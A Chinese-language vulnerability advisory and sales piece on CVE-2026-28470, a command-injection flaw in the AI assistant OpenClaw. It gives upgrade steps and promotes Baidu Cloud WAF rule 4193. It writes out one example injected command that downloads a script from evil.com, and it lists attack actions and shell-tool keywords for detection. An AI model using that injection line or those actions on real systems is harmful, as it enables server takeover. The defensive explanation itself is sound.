开源 AI 智能助理 OpenClaw 被曝存在一个高危参数注入漏洞(CVE-2026-28470)。攻击者无需任何身份认证,仅通过向 OpenClaw 服务发送精心构造的命令,即可在服务器上执行任意系统命令,完全控制目标主机。该漏洞影响所有 2026.2.2 之前版本,官方已发布安全补丁。在无法立即升级的情况下,部署 百度云防护 WAF 可在网络层实时拦截恶意注入流量,为企业提供“虚拟补丁”级的即时防护。
一、 漏洞核心信息
| 项目 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-28470 |
| CNVD 编号 | CNVD-2026-20006 |
| CVSS 评分 | 10.0(严重) – AV:N/AC:L/Au:N/C:C/I:C/A:C |
| 漏洞类型 | 参数注入(命令注入) |
| 攻击向量 | 网络远程利用 |
| 攻击复杂度 | 低 |
| 所需权限 | 无 |
| 用户交互 | 不需要 |
| 影响产品 | OpenClaw 开源智能人工助理 |
| 受影响版本 | OpenClaw < 2026.2.2 |
| 安全版本 | OpenClaw 2026.2.2 及以上 |
| 官方补丁 | https://github.com/openclaw/openclaw/security/advisories/GHSA-3hcm-ggvf-rch5 |
OpenClaw 是一个流行的开源 AI 智能助理,支持自然语言交互、自动化任务执行等功能。该漏洞允许攻击者通过注入命令替换语法,远程执行任意系统命令。
二、 漏洞原理:参数注入如何导致 RCE
2.1 漏洞产生的原因
OpenClaw 在处理用户输入的命令参数时,未对特殊字符(如 ;、|、&、$()、` 等)进行充分过滤或转义,导致攻击者可以在正常命令中“注入”额外的恶意系统命令。
典型攻击场景:假设 OpenClaw 提供了一个文件处理功能,用户输入 rename old.txt new.txt。如果攻击者输入 rename old.txt; wget http://evil.com/shell.sh,系统可能先执行文件重命名,然后执行 wget 下载恶意脚本。
2.2 攻击链路
- 攻击者通过网络向 OpenClaw 服务发送一个精心构造的恶意指令(例如通过 HTTP API、WebSocket 或命令行接口)。
- 由于参数校验缺失,恶意命令中的注入部分被底层系统直接执行。
- 攻击者可借此:
- 反弹 Shell,完全控制服务器
- 下载并执行挖矿木马、勒索病毒
- 窃取敏感文件(如数据库配置、用户凭证)
- 横向渗透内网
2.3 影响范围
OpenClaw 被广泛应用于个人助理、企业自动化、智能客服等场景。该漏洞影响所有 2026.2.2 之前 的版本,包括 2026.1.x、2025.x 等历史版本。由于 OpenClaw 通常以较高权限运行(如 systemd 服务或 Docker 容器 root 用户),成功利用后攻击者可获得极高的系统控制权。
三、 漏洞危害
| 危害类型 | 具体后果 |
|---|---|
| 远程代码执行 | 攻击者可在目标服务器上执行任意系统命令,如 id、curl、nc 反弹 Shell |
| 服务器完全失陷 | 写入 Webshell、添加后门用户、安装挖矿程序、加密勒索 |
| 数据泄露 | 读取 /etc/passwd、配置文件、数据库密码、API 密钥、用户聊天记录 |
| 横向渗透 | 以失陷服务器为跳板攻击内网其他业务系统(如数据库、OA、ERP) |
| 服务可用性破坏 | 通过 rm -rf 或 shutdown 导致服务中断、数据丢失 |
真实威胁:由于 OpenClaw 可通过 API 对外提供服务,暴露在公网上的实例极易被自动化扫描工具发现并利用。PoC/EXP 已公开,攻击门槛极低。
四、 修复与临时缓解方案
4.1 立即升级(官方推荐)
升级至 OpenClaw 2026.2.2 或更高版本:
# 根据官方文档升级
cd openclaw
git pull
git checkout 2026.2.2
make install
# 或使用 Docker 拉取最新镜像
docker pull openclaw/openclaw:latest4.2 临时缓解(如无法立即升级)
| 措施 | 操作 |
|---|---|
| 限制网络访问 | 在防火墙或安全组中限制 OpenClaw 服务端口(默认 1865)仅允许可信 IP 访问 |
| 禁用危险命令 | 修改 OpenClaw 配置,禁用文件操作、系统命令调用等敏感模块(需查阅官方文档) |
| 使用低权限账户运行 | 避免以 root 或管理员权限运行 OpenClaw,使用独立的低权限系统账户 |
| 部署 WAF | 在网络层拦截恶意命令注入流量 |
五、 百度云防护 WAF:不升级代码也能拦截命令注入
5.1 WAF 如何防御参数注入漏洞?
对于 OpenClaw 的参数注入漏洞,攻击流量中必然包含命令注入特征(如 ;、|、&、$(、`、\n 等)。百度云防护 WAF 通过语义分析 + 正则匹配,可实时检测并阻断此类恶意请求。
5.2 内置命令注入防护规则
百度云防护 WAF 已内置 命令注入检测规则(规则 ID 4193 Injection.command_inj.A),专门拦截变种的命令注入攻击。该规则覆盖:
- 常见命令分隔符:
;、&、|、&&、|| - 命令替换语法:
$(...)、`...` - 危险命令关键字:
wget、curl、nc、bash、sh、python -c、perl -e - 编码混淆自动解码:URL编码、Base64、Unicode转义等
5.3 JA4 指纹识别 + IP 情报库辅助防御
攻击者常使用自动化工具(如 curl、python requests、nuclei)进行漏洞探测。这些工具的 JA4 指纹 固定,百度云防护可通过自定义规则直接封杀。同时,IP 情报库可实时识别并阻断代理 IP、云服务 IP 等常见攻击源。
5.4 规则启用步骤
如果已经接入百度云防护 WAF:
- 登录控制台 → 防护配置 → Web防护 → 内置规则
- 搜索规则 ID 4193(
Injection.command_inj.A) - 确认状态为“开启”,处置动作为“拦截”(若为“观察”,请手动修改)
如果尚未接入,欢迎联系 主机吧 获取免费安全评估和接入指导。
六、 总结
CVE-2026-28470 是一个严重级别的命令注入漏洞,影响所有 OpenClaw 2026.2.2 之前的版本。攻击者可远程执行任意命令,完全控制服务器。官方补丁已发布,建议立即升级。对于无法停服升级的生产环境,部署 百度云防护 WAF 可在网络层实时拦截恶意命令注入流量,提供等效于虚拟补丁的即时保护。
推荐行动路径:
| 优先级 | 措施 | 说明 |
|---|---|---|
| 紧急 | 部署百度云防护 WAF,确认规则 4193 生效 | 立即获得虚拟补丁,阻断攻击流量 |
| 高 | 升级 OpenClaw 至 2026.2.2 或更高版本 | 从根源修复漏洞 |
| 中 | 限制 OpenClaw 服务端口访问来源 IP | 减少暴露面 |
| 中 | 审计历史日志,排查是否已被入侵 | 检查是否有异常命令执行记录 |
主机吧 | 百度云防护官方合作伙伴
提供 WAF 接入、高防 CDN、高防 IP、高防服务器、SSL 证书一站式服务
让每一次命令注入都无处遁形,让每一台 AI 服务器都固若金汤。
